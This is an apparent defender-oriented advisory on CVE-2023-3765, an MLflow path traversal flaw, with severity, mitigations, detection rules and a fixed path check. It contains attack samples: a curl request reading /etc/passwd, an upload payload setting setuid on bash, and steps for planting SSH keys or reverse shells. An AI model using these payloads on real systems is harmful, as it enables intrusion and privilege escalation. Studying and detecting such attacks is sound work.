CVE-2023-3765
Weakness (CWE): CWE-36 (Absolute Path Traversal)
CVSS Vector (v3.1): AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Changed
- Confidentiality: High
- Integrity: High
- Availability: High
Description
Absolute Path Traversal in GitHub repository mlflow/mlflow prior to 2.5.0.
Comprehensive Technical Analysis of CVE-2023-3765 (MLflow Absolute Path Traversal Vulnerability)
1. Vulnerability Assessment and Severity Evaluation
- CVE ID: CVE-2023-3765
- CVSS Score: 10.0 (Critical) – AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- Vulnerability Type: Absolute Path Traversal (CWE-36)
- Affected Software: MLflow (prior to version 2.5.0)
Severity Justification
- Attack Vector (AV:N): Exploitable remotely over a network without authentication.
- Attack Complexity (AC:L): Low complexity; no special conditions required.
- Privileges Required (PR:N): No privileges needed; unauthenticated exploitation possible.
- User Interaction (UI:N): No user interaction required.
- Scope (S:C): Changes scope (impacts other components beyond the vulnerable system).
- Confidentiality (C:H), Integrity (I:H), Availability (A:H): High impact on all three security pillars.
This vulnerability is critical due to its unauthenticated remote exploitation potential, allowing attackers to read, modify, or delete arbitrary files on the host system, leading to full system compromise.
2. Potential Attack Vectors and Exploitation Methods
Root Cause Analysis
The vulnerability stems from improper path sanitization in MLflow’s file-handling mechanisms, particularly in components responsible for artifact storage and retrieval. An attacker can manipulate file paths to traverse outside the intended directory structure, accessing sensitive system files.
Exploitation Methods
1. Arbitrary File Read
  - An attacker crafts a malicious HTTP request containing directory traversal sequences (e.g., ../../../../etc/passwd).
  - MLflow fails to sanitize the input, allowing the attacker to read sensitive files (e.g., /etc/shadow, configuration files, SSH keys).
2. Arbitrary File Write (Potential RCE)
  - If MLflow allows file uploads (e.g., model artifacts), an attacker could write malicious files (e.g., web shells, cron jobs) to executable directories.
  - Example payload:
```
POST /api/2.0/mlflow/artifacts/upload HTTP/1.1
Host: vulnerable-mlflow-server
Content-Type: multipart/form-data; boundary=----

------
Content-Disposition: form-data; name="file"; filename="../../../../tmp/exploit.sh"

#!/bin/bash
chmod +s /bin/bash
------
```
  - If the server processes the file, this could lead to remote code execution (RCE).
3. Denial-of-Service (DoS)
  - An attacker could delete critical system files (e.g., /etc/passwd, /var/log/*), causing system instability.
Proof-of-Concept (PoC) Exploit
A simplified PoC for file read:
```
curl -X GET "http://<MLFLOW_SERVER>/api/2.0/mlflow/artifacts/get?path=../../../../etc/passwd" -H "Authorization: Bearer <VALID_OR_INVALID_TOKEN>"
```
- If the server is vulnerable, it returns the contents of /etc/passwd.
3. Affected Systems and Software Versions
- Affected Software: MLflow (open-source platform for machine learning lifecycle management)
- Vulnerable Versions: All versions prior to 2.5.0
- Fixed Version: 2.5.0 (released July 19, 2023)
- Deployment Scenarios:
- Self-hosted MLflow instances (on-premises/cloud)
- MLflow tracking servers in enterprise ML pipelines
- CI/CD pipelines integrating MLflow for model deployment
Detection Methods
- Network Scanning:
  - Identify MLflow instances via HTTP headers (Server: MLflow/2.x.x).
  - Check for exposed /api/2.0/mlflow/artifacts endpoints.
- Vulnerability Scanning:
  - Use Nessus, OpenVAS, or Nuclei with CVE-2023-3765 detection templates.
- Manual Verification:
  - Attempt path traversal via curl or Burp Suite.
4. Recommended Mitigation Strategies
Immediate Actions
1. Upgrade to MLflow 2.5.0 or Later
  - Apply the official patch from GitHub commit 6dde937.
  - Verify the fix by testing path traversal attempts.
2. Network-Level Protections
  - Restrict Access: Use firewalls to limit MLflow server exposure to trusted IPs.
  - WAF Rules: Deploy a Web Application Firewall (WAF) (e.g., ModSecurity, Cloudflare) to block path traversal payloads (../, ..\, %2e%2e%2f).
3. Runtime Protections
  - Containerization: Run MLflow in a least-privilege container (e.g., Docker with a read-only filesystem).
  - Chroot Jail: Isolate MLflow in a restricted filesystem environment.
4. Authentication & Authorization
  - Enable Authentication: Configure MLflow with basic auth, OAuth, or API keys.
  - Role-Based Access Control (RBAC): Restrict artifact access to authorized users.
5. Monitoring & Logging
  - Enable Audit Logs: Track file access attempts in MLflow logs.
  - SIEM Integration: Forward logs to Splunk, ELK, or Datadog for anomaly detection.
Long-Term Recommendations
- Regular Vulnerability Scanning: Use Trivy, Snyk, or Dependabot to detect outdated dependencies.
- Secure Coding Practices: Implement input validation and path normalization in custom MLflow integrations.
- Zero Trust Architecture: Assume breach; enforce micro-segmentation and least privilege.
5. Impact on the Cybersecurity Landscape
Enterprise & Cloud Implications
- MLOps Supply Chain Risk:
- MLflow is widely used in MLOps pipelines (e.g., Databricks, AWS SageMaker, Azure ML).
- A compromise could lead to model poisoning, data exfiltration, or lateral movement in cloud environments.
- Data Breach Potential:
- Attackers could steal training datasets, model weights, or API keys stored in MLflow artifacts.
- Regulatory Compliance Risks:
- GDPR, HIPAA, CCPA: Unauthorized file access may violate data protection laws, leading to fines and legal action.
Threat Actor Motivations
- Cybercriminals: Exfiltrate sensitive data for extortion (ransomware) or sale on the dark web.
- Nation-State Actors: Target MLflow in espionage campaigns to steal proprietary AI models.
- Insider Threats: Malicious insiders could escalate privileges via path traversal.
Broader Industry Trends
- Increased Targeting of MLOps Tools:
- Similar vulnerabilities have been found in Kubeflow, TensorFlow Serving, and Jupyter Notebooks.
- Shift Left in ML Security:
- Organizations are adopting SAST/DAST for ML code and runtime protection for models.
- Bug Bounty Programs:
- The disclosure via Huntr.dev highlights the growing role of crowdsourced security research in identifying critical vulnerabilities.
6. Technical Details for Security Professionals
Vulnerable Code Analysis
The vulnerability resides in MLflow’s artifact handling logic, where user-supplied paths are not properly sanitized. Example of flawed code (simplified):
```python
import os

def get_artifact_path(user_path):
    base_dir = "/mlflow/artifacts"
    # Unsafe path joining: "../" segments are kept as-is, and an absolute
    # user_path makes os.path.join() discard base_dir entirely.
    full_path = os.path.join(base_dir, user_path)
    return full_path
```
- Issue: os.path.join() does not prevent traversal if user_path contains ../.
- Fix: Use os.path.abspath() + os.path.commonpath() to enforce directory boundaries.
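As an added example (not MLflow's code), the flawed function above next to a hardened version that applies the os.path.abspath() + os.path.commonpath() check the Fix line describes; the /mlflow/artifacts root is taken from the snippet. It also covers the absolute-path case that gives CWE-36 its name, since os.path.join() silently replaces base_dir when user_path is absolute.

```python
import os

BASE_DIR = "/mlflow/artifacts"  # artifact root from the page's snippet


def get_artifact_path_unsafe(user_path, base_dir=BASE_DIR):
    # The flawed pattern: "../" segments survive, and an absolute user_path
    # makes os.path.join() throw base_dir away entirely.
    return os.path.join(base_dir, user_path)


def get_artifact_path_safe(user_path, base_dir=BASE_DIR):
    """Resolve user_path under base_dir; raise ValueError if it escapes.

    abspath() collapses "." and ".." segments (but not symlinks: use
    realpath() on a real filesystem); commonpath() then proves the result
    lies under base, which a plain string-prefix check does not
    (/mlflow/artifacts2/x starts with /mlflow/artifacts).
    """
    base = os.path.abspath(base_dir)
    candidate = os.path.abspath(os.path.join(base, user_path))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError(f"path escapes artifact root: {user_path!r}")
    return candidate


def is_contained(user_path, base_dir=BASE_DIR):
    """True if user_path resolves inside base_dir, False otherwise."""
    try:
        get_artifact_path_safe(user_path, base_dir)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for p in ["model/weights.bin", "../../../../etc/passwd",
              "/etc/passwd", "../artifacts2/x"]:
        print(f"{p!r:28} unsafe={get_artifact_path_unsafe(p)!r:44} "
              f"contained={is_contained(p)}")
```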
Exploit Chaining Potential
- Initial Access:
  - Exploit CVE-2023-3765 to read /etc/passwd and identify users.
- Privilege Escalation:
  - If MLflow runs as root, write a cron job or SSH key to /root/.ssh/authorized_keys.
- Lateral Movement:
  - Use stolen credentials to pivot to other systems in the network.
- Persistence:
  - Deploy a reverse shell or backdoor via MLflow artifact uploads.
Forensic Indicators of Compromise (IOCs)
| Indicator | Description |
|---|---|
| GET /api/2.0/mlflow/artifacts/get?path=../../ | Path traversal attempt in logs. |
| POST /api/2.0/mlflow/artifacts/upload | Suspicious file uploads with traversal payloads. |
| /tmp/.malicious.sh | Unexpected scripts in temporary directories. |
| chmod +s /bin/bash | Evidence of privilege escalation. |
Detection & Hunting Queries
- Splunk:
```
index=mlflow sourcetype=mlflow:api
| search uri_path="*/artifacts/get*" OR uri_path="*/artifacts/upload*"
| regex uri_path="\.\./|\.\.\\\\"
| stats count by src_ip, uri_path
```
- Sigma Rule (YAML):
```yaml
title: MLflow Path Traversal Attempt
id: 12345678-1234-5678-1234-567812345678
status: experimental
description: Detects path traversal attempts in MLflow API
references:
  - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3765
author: Your Name
date: 2023/07/19
logsource:
  category: webserver
  product: mlflow
detection:
  selection:
    cs-uri-query|contains:
      - "../"
      - "..\\"
      - "%2e%2e%2f"
  condition: selection
falsepositives:
  - Legitimate artifact paths with dots
level: high
```
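As an added example, not from the page or from MLflow, the Sigma selection above applied in Python to constructed access-log lines: the path parameter is URL-decoded before matching, so the %2e%2e%2f variant, the backslash variant and the absolute-path form all reach the same check, and results are reported per src_ip, method and decoded path as the Splunk stats step does. The log lines, hosts and IPs are constructed for the example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Traversal test from the Sigma rule, applied to the decoded value: ".." as a
# whole path segment, so "data/v1.2.3/train.csv" (the listed false positive)
# does not match. Absolute paths are flagged separately (CWE-36).
TRAVERSAL = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")
ARTIFACT_ENDPOINTS = ("/artifacts/get", "/artifacts/upload")

# Constructed common-log-format lines; hosts and addresses are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [19/Jul/2023:10:01:02 +0000] "GET /api/2.0/mlflow/artifacts/get?path=models/run1/model.pkl HTTP/1.1" 200 4096
10.0.0.9 - - [19/Jul/2023:10:01:07 +0000] "GET /api/2.0/mlflow/artifacts/get?path=../../../../etc/passwd HTTP/1.1" 200 2133
10.0.0.9 - - [19/Jul/2023:10:01:09 +0000] "GET /api/2.0/mlflow/artifacts/get?path=%2e%2e%2f%2e%2e%2fetc%2fshadow HTTP/1.1" 403 0
10.0.0.9 - - [19/Jul/2023:10:01:15 +0000] "POST /api/2.0/mlflow/artifacts/upload?path=..%5c..%5ctmp%5cexploit.sh HTTP/1.1" 201 0
10.0.0.7 - - [19/Jul/2023:10:02:00 +0000] "GET /api/2.0/mlflow/artifacts/get?path=data/v1.2.3/train.csv HTTP/1.1" 200 9999
10.0.0.9 - - [19/Jul/2023:10:02:30 +0000] "GET /api/2.0/mlflow/artifacts/get?path=/etc/passwd HTTP/1.1" 200 2133
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def suspicious_paths(line):
    """Decoded 'path' values in this request that escape the artifact root, or []."""
    m = LOG_RE.match(line)
    if not m:
        return []
    url = urlsplit(m.group("target"))
    if not any(url.path.endswith(ep) for ep in ARTIFACT_ENDPOINTS):
        return []
    hits = []
    for raw in parse_qs(url.query).get("path", []):
        decoded = unquote(raw)  # parse_qs decoded once; again for double-encoding
        if TRAVERSAL.search(decoded) or decoded.startswith(("/", "\\")):
            hits.append(decoded)
    return hits


def hunt(log_text):
    """(src_ip, method, decoded_path) for every suspicious request in the log."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        for p in suspicious_paths(line):
            findings.append((m.group("src"), m.group("method"), p))
    return findings
```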
Conclusion
CVE-2023-3765 represents a critical risk to organizations using MLflow, with unauthenticated remote exploitation leading to full system compromise. Immediate patching, network segmentation, and runtime protections are essential to mitigate this threat. Security teams should monitor for exploitation attempts, hunt for IOCs, and integrate MLflow into their vulnerability management programs.
For further details, refer to: